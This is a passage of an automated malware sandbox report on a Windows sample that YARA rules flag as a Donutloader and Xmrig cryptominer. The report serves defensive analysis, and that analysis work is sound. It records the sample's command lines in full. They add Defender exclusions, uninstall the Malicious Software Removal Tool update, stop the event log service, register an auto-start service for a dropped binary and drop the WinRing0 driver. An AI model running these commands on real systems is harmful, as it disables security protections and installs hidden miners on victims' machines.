        Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: gtebvdararzg.sys.18.drBinary string: \Device\WinRing0_1_2_0
        Source: classification engineClassification label: mal100.evad.mine.winEXE@38/12@1/1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877D5F0 memset,GetModuleHandleW,FormatMessageW,GetLastError,0_2_00007FF72877D5F0
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\urmtbcjngppibwna
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6816:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmgre3nn.jyw.ps1Jump to behavior
        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exeReversingLabs: Detection: 44%
        Source: nlkuzmdacjrb.exeString found in binary or memory: zT+KKvYG+8OHa88Rzf2NDmRX1ZBVFrA3eyoz0eM/4pyt34L4/QjwdU4dbhPGMWLFdlzURLtrE+iWJEEGIvnkc/9+mLTUxvsXYOA+mVAw/rEQWUD3JHzuUnG2X3cjUJ8ejrf3/36V/OUx10FQR8uJfqlB0LYjogYywgVksUe+1JTeScV4FajnAZahgfI9xpgw29oGBrN2A/IzRYuZfkPzw1OyIwlh//iXY0KyA/L/aDDf0lIiA+LWRmBVVU8mGRZ3P3PC
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\notepad.exe notepad.exe
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "MXOLIHZI"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\notepad.exe notepad.exe
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\notepad.exe notepad.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "MXOLIHZI"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\notepad.exe notepad.exeJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: wininet.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: amsi.dllJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: file.exeStatic file information: File size 3779584 > 1048576
        Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x37a800
        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr
        Source: Binary string: ad.pdb" source: file.exe, nlkuzmdacjrb.exe.0.dr
        Source: Binary string: ad.pdb source: file.exe, nlkuzmdacjrb.exe.0.dr
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877F4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF72877F4E0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001BB80981394 push dword ptr [00008C01h]; ret 0_2_000001BB80981403
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00000122A4921394 push dword ptr [00008C01h]; ret 18_2_00000122A4921403
        Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001394 push qword ptr [0000000140009004h]; ret 23_2_0000000140001403

        Persistence and Installation Behavior

        barindex
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeFile created: C:\Windows\TEMP\gtebvdararzg.sysJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeJump to dropped file
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeFile created: C:\Windows\Temp\gtebvdararzg.sysJump to dropped file
        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeJump to dropped file
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeFile created: C:\Windows\Temp\gtebvdararzg.sysJump to dropped file
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
